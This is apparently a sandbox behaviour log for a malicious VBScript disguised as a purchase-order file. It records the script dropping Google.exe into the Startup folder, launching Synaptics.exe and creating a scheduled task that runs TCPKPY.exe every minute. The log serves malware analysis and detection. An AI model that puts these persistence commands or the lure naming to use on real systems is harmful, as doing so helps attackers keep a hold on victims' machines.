                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: Open Purchase Order Summary Sheet.vbsVirustotal: Detection: 38%
                            Source: Open Purchase Order Summary Sheet.vbsReversingLabs: Detection: 26%
                            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\Users\user\AppData\Local\Temp\._cache_Google.exe "C:\Users\user\AppData\Local\Temp\._cache_Google.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                            Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 3184
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 3360
                            Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7732 -s 9672
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\Users\user\AppData\Local\Temp\._cache_Google.exe "C:\Users\user\AppData\Local\Temp\._cache_Google.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbsJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wsock32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: twext.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: starttiledata.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: acppage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: msi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: aepic.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: wsock32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
